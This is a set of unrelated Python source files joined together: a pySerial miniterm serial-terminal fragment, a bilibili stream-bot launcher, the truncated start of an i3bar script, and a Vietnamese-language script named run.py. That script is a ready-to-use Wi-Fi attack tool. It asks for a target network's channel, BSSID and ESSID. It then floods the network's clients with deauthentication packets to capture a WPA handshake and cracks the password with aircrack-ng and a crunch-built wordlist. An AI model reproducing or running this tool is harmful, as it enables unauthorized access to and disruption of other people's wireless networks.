return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
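# --- Editor's illustrative sketch (not part of the original miniterm code) ---
# Miniterm.update_transformations() below builds a tx chain of
# [EOL transform] + [selected filters] and applies the same chain in reverse
# order on the rx side. The standalone helper here only demonstrates that
# chaining with the classes defined above; the chosen eol/filter values are
# example defaults and the function is never called by miniterm itself.
def _example_transformation_chain(eol='crlf', filters=('default',)):
    """Return (tx, rx) callables that apply the configured transformations."""
    chain = [EOL_TRANSFORMATIONS[eol]()] + [TRANSFORMATIONS[f]() for f in filters]
    def tx(text):
        for t in chain:                 # console -> serial, in order
            text = t.tx(text)
        return text
    def rx(text):
        for t in reversed(chain):       # serial -> console, reversed order
            text = t.rx(text)
        return text
    return tx, rx
# e.g. _example_transformation_chain()[0]('hello\n') == 'hello\r\n'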
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
            # on RFC 2217 ports, this can happen if no modem state notification
            # was received yet. Ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7':  # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script
# e.g. to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
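# --- Editor's illustrative sketch (not part of the original miniterm code) ---
# The note above main() says its default arguments exist so main() can be called
# from another script, e.g. a "miniterm-my-device.py" wrapper. A minimal,
# hypothetical wrapper is sketched below; the port name and baud rate are
# assumptions, and the function is only defined here, never called.
def _example_miniterm_my_device():
    """Launch miniterm preconfigured for one specific device."""
    # preselect a port and baud rate so the user is not prompted for them
    main(default_port='/dev/ttyUSB0', default_baudrate=115200)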
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
run.py
|
# Load the required modules
import os
import time
from threading import Thread
import threading
import sys
import os.path
from multiprocessing import Process
#----------------------------------------------
# Preset values
help_error = set(['h','H'])
card_network = os.listdir('/sys/class/net/')
yes = set(['yes','y', 'ye', 'Y','Ye','YES'])
no = set(['n','no','N','NO'])
PATH = 'Sat-pwd.txt'
#-----------------------------------------------
# Start of the program
#-------------------------------------------
def attack():
os.system('clear')
input('<><> Enter để tiếp tục : ')
pwd = input('<><> Đường dẫn đến file password : ')
path_check = os.path.isfile(pwd)
while path_check is False:
pwd = input('<><> [ ! ] File không tồn tại [ ! ] Nhập lại : ')
path_check = os.path.isfile(pwd)
os.system('clear')
os.system('sudo aircrack-ng -a 2 -w '+pwd+' '+'"'+essid+'-01.cap'+'"')
os.system('rm *.cap *.csv *.netxml')
    input('''
<><><><><><><><><><><><><><><><><><><><><><><><><><>
[ ! ] Đã có mật khẩu. Nhấn Enter để thoát chương trình [ ! ]
[ ! ] Nếu chưa có . Đảm bảo rằng mục tiêu của bạn đang có ít nhất một người đang dùng Wifi và khoảng cách sóng đủ mạnh [ ! ]
<><><><><><><><><><><><><><><><><><><><><><><><><><>''')
os.system('airmon-ng stop '+interface+'mon')
os.system('clear')
exit()
#------------------------------------------------
def help():
os.system('clear')
print ('''[ ! ] Lỗi xảy ra do các nguyên nhân sau [ ! ]
1. Máy của bạn không hỗ trợ
2. Bạn gõ không đúng tên giao diện [ Không thêm bất cứ kí tự khác kể cả dấu trắng ]
3. Bạn chọn không đúng tên giao diện mạng [ Đảm bảo bạn chọn Wireless ]
4. Bạn đã bật chế độ Monitor trên giao diện đó [ Chỉ cần tắt đi là được ]
[ ! ] Nếu không giả quyết được vui lòng liên hện : itsat1728.blogspot.com [ ! ]
<><> Nhấn Enter để quay lại ! <><>''')
input('<><> Enter ?')
tuy_chon3()
#--------------------------------------------
def information():
global essid
print('''
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
[ ! ] Nhắm mục tiêu của bạn và cho chúng tôi biết các giá trị sau : CH - BSSID - ESSID [ ! ]
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>''')
print('<><><><><> [ ! ] https://itsat1728.blogspot.com [ ! ] <><><><><>')
input('<><><><><> [ ! Enter để tiếp tuc ! ]')
print('''<><><><><><><><><><><><><><>
KHÔNG ĐƯỢC PHÉP CHỨA BẤT KÌ DẤU CÁCH NÀO TRONG CÁC CÂU TRẢ LỜI !
1. Lỗi sẽ xảy ra nếu bạn làm sai.
2. Lỗi xảy ra nếu bạn gõ sai
<><><><><><><><><><><><><><><>''')
ch = input('<><> CH : ')
while ch < '1' :
print('<><> Đùa nhau hả ?')
ch = input('<><> CH : ')
bssid = input('<><> BSSID : ')
essid = input('<><> ESSIS : ')
os.system('clear')
def scanner():
os.system('sudo airodump-ng -c '+ch+' --bssid '+bssid+' -w '+'"'+essid+'"'+' '+interface+'mon')
def scanner2():
os.system('xfce4-terminal -x sudo aireplay-ng -0 1000 -a '+bssid+' '+interface+'mon')
def stop_scanner():
os.system('killall airodump-ng')
os.system('killall aireplay-ng')
t1 = Process(target=scanner)
t2 = Process(target=scanner2)
t3 = Process(target=stop_scanner)
t1.start()
t2.start()
time.sleep(120)
t3.start()
os.system('clear')
attack()
#--------------------------------------------
def banner():
os.system('clear')
print('''
CHƯƠNG TRÌNH BÁN TỰ ĐỘNG HÓA AIRCRACK-NG
AUTHOR : IT SAT [ PyThOn 3 ]
BLOG : HTTPS://ITSAT1728.BLOGSPOT.COM
''')
print(' [ ! ] Người sủ dụng :'+ name +' [ ! ]')
print('''
1. YÊU CẦU :
> Aircrack-ng
> Crunch
> Root [ Bạn có thể sửa bằng cachs thêm sudo vào các lệnh trong này ]
> Đọc README.txt
> Sử dụng màn hình trong kích cỡ tối đa
2. TÙY CHỌN
1. Cài đặt Aircrack-ng và các chương trình liên quan
2. Tạo file từ điển mật khẩu bằng crunch
3. Có tất rồi ! Bỏ qua và chuyển đến chương trình chính
4. Thoát
<><><><><><><><><><><><><><><<><><><><><><><><><><><><><> ''')
#-----------------------------------------------------------
def crunch():
os.system('clear')
print('''Crunch sẽ dùng theo lệnh cấu trúc như sau :
crunch [min] [max] [charset] -t [pattern] -o [path file]
với:
[charset]: kí tự có trong mật khẩu
[pattern]: các kí tự bạn đã biết chắc
[path file]: đừng dẫn file được tạo ''')
so_luong= input('<><> Chọn số lượng kí tự bạn nghĩ có trong mật khẩu [ Chọn số tự nhiên khác 0 nếu bạn không muốn bị lỗi trong các bước tiếp theo ]: \n<><> : ')
charset = input('<><> Các kí tự bạn nghĩ sẽ có trong mật khẩu : \n<><> : ')
print('''[ ! ] Các kí tự bãn đã biết chắc là các kí tự bạn đã biết nó là gì và ở vị trí nào [ ! ]
=> Ví dụ bạn nghĩ mật khẩu chứa 3 kí tự và bạn đã biết 1 kí tự là 3 và là kí tự thứ 2 vậy phần này bạn sẽ trả lời là @3@
=> Còn nếu không biết kí tự nào cả hay cách sắp xếp của chúng thì chỉ cần gõ @@@ tương ứng với câu trả lời phía trên của bạn , tức phía trên cùng bạn trả lời là 3 thì dưới này gõ 3 dấu @@@ ''')
pattern = input ('<><> Các kí tự bạn đã biết chắc : \n<><> : ')
os.system('clear')
print('''
<><><><><><><><><><><><><>
''')
os.system('rm Sat-pwd.txt')
os.system('crunch '+so_luong+' '+so_luong+' '+charset+' -t '+pattern+' -o '+'Sat-pwd.txt')
print('''
<><><><><><><><><><><><><>
''')
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
print ('''File tạo thành công . Nhấn Enter để quay về trang chủ
==> File tên : Sat-pwd.txt <==
''')
input('<><> ? <><>')
banner()
tuy_chon()
else:
print ('''File tạo không thành công . Thử lại ?
''')
input('<><> ? <><>')
banner()
tuy_chon()
tuy_chon()
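# --- Editor's illustrative sketch (not part of the original script) ---
# crunch() above explains the command structure it shells out to:
#     crunch [min] [max] [charset] -t [pattern] -o [path file]
# The helper below only assembles that argument list for a made-up set of
# answers so the mapping from the prompts to the command line is easier to see;
# the values are hypothetical and the function is never called by the script.
def _example_crunch_command(length='8', charset='0123456789', pattern='@@@@@@@@', out='Sat-pwd.txt'):
    """Return the crunch argument list the script would build for these answers."""
    # the script uses the same value for crunch's [min] and [max]
    return ['crunch', length, length, charset, '-t', pattern, '-o', out]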
#--------------------------------------------------------------
def tuy_chon3():
os.system('clear')
print('<><> Bạn đang ở tùy chọn 3 : '+name+' <><>')
print ('<><><><><><><><><><><><><><><>')
os.system('sudo airmon-ng check kill')
os.system('sudo airmon-ng start '+interface)
print('<><><><><><><><><><><><><><><>')
interface2 = os.listdir('/sys/class/net/')
check = interface+'mon'
if check in interface2 :
print ('''
<><><><><><><><>
Thành công ! . Đã chuyển sang chế độ giám sát <><><>
<><><><><><><><>''')
else :
print ('''
[ ! ] Oh No ! Hình như bạn vừa gõ sai tên giao diện hoặc một lỗi không xác định đã xảy ra ! [ ! ]
''')
reset = input('''<><> Nhấn Enter để thử lại
<><> Nhấn H để gọi trợ giúp :
<><> Nhấn 2 để bỏ qua lỗi và không xử lí được vấn đề. Ha Ha Ha
<><> Bạn muốn ? :''')
if reset in help_error :
help()
elif reset == '2':
pass
else:
tuy_chon3()
def airodump_ng():
os.system('airodump-ng wlan0mon')
def close_airodump():
os.system('killall airodump-ng')
p1 = Process(target=airodump_ng)
p2 = Process(target=close_airodump)
p1.start()
time.sleep(60)
p2.start()
information()
#---------------------------------------------------------
def tuy_chon2():
xac_thuc = input('<><> Bạn đang chọn tùy chọn 2 ! Tiếp tục hay không [ Enter để tiếp tục , N để thoát ! ] :>>>: ')
if xac_thuc in no :
banner()
tuy_chon()
else :
crunch()
def tuy_chon():
chon = input('<><> Lựa chọn của bạn là : ')
if chon == '1':
os.system('clear')
os.system('sudo apt install aircrack-ng && sudo apt install crunch')
banner()
print('''
<><><><><><><><>
Cài đặt hoàn tất
<><><><><><><><>''')
tuy_chon()
elif chon == '2' :
tuy_chon2()
elif chon == '3' :
tuy_chon3()
elif chon == '4' :
print ('<><> Bye Bye <><>')
time.sleep(2)
os.system('clear')
exit()
else :
banner()
tuy_chon()
#---------------------------------------
os.system('rm *.cap *.csv *.netxml')
os.system('clear')
name = input('<><> Tên của bạn là gì ? :')
print ('<><> Hiện tại máy bạn đang có các giao diện mạng sau <><>')
print (card_network)
interface = input('<><> Tên giao diện mạng bạn định dùng là [!] Giao diện không dây [!]: ')
if interface+'mon' in card_network:
print('''
<><><><><><><><><><><><><><>
[ ! ] Hình như máy bạn đã bật chế độ monitor. Làm ơn tắt nó đi và chạy lại chương trình nếu không bạn sẽ gặp lỗi ở các bước sau [ ! ]
<><><><><><><><><><><><><><>
''')
else:
pass
while interface not in card_network:
interface = input('<><> Tên giao diện mạng bạn định dùng là [!] Giao diện không dây [!]: ')
if interface+'mon' in card_network:
print('''
<><><><><><><><><><><><><><>
[ ! ] Hình như máy bạn đã bật chế độ monitor. Làm ơn tắt nó đi và chạy lại chương trình hoặc bạn sẽ bị lỗi ở các bước sau [ ! ]
<><><><><><><><><><><><><><>
''')
else:
banner()
tuy_chon()
|
run.py
|
import OnlineHeart
import Silver
import Tasks
import connect
from rafflehandler import Rafflehandler
import asyncio
import printer
from statistics import Statistics
from bilibili import bilibili
from configloader import ConfigLoader
import threading
import os
import online_net
import bili_console
from bilitimer import BiliTimer
loop = asyncio.get_event_loop()
fileDir = os.path.dirname(os.path.realpath(__file__))
conf = ConfigLoader(fileDir)
area_ids = conf.dic_user['other_control']['area_ids']
# print('Hello world.')
printer.init_config()
bilibili()
online_net.login()
online_net.OnlineNet()
Statistics(len(area_ids))
rafflehandler = Rafflehandler()
var_console = bili_console.Biliconsole(loop)
list_raffle_connection = [connect.RaffleConnect(i) for i in area_ids]
list_raffle_connection_task = [i.run() for i in list_raffle_connection]
yjconnection = connect.YjConnection()
danmu_connection = connect.connect()
bili_timer = BiliTimer(loop)
console_thread = threading.Thread(target=var_console.cmdloop)
console_thread.start()
Tasks.init()
tasks = [
OnlineHeart.run(),
Silver.run(),
danmu_connection.run(),
rafflehandler.run(),
yjconnection.run()
]
try:
loop.run_until_complete(asyncio.wait(tasks + list_raffle_connection_task))
except KeyboardInterrupt:
# print(sys.exc_info()[0], sys.exc_info()[1])
if ConfigLoader().dic_user['other_control']['keep-login']:
pass
else:
response = online_net.logout()
console_thread.join()
loop.close()
|
i3bar.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import time
import os
import json
import string
import threading
import subprocess as sp
arr = []
text = ''
def LOG(content):
pass
# with open("/home/pallav/log2", "a") as f:
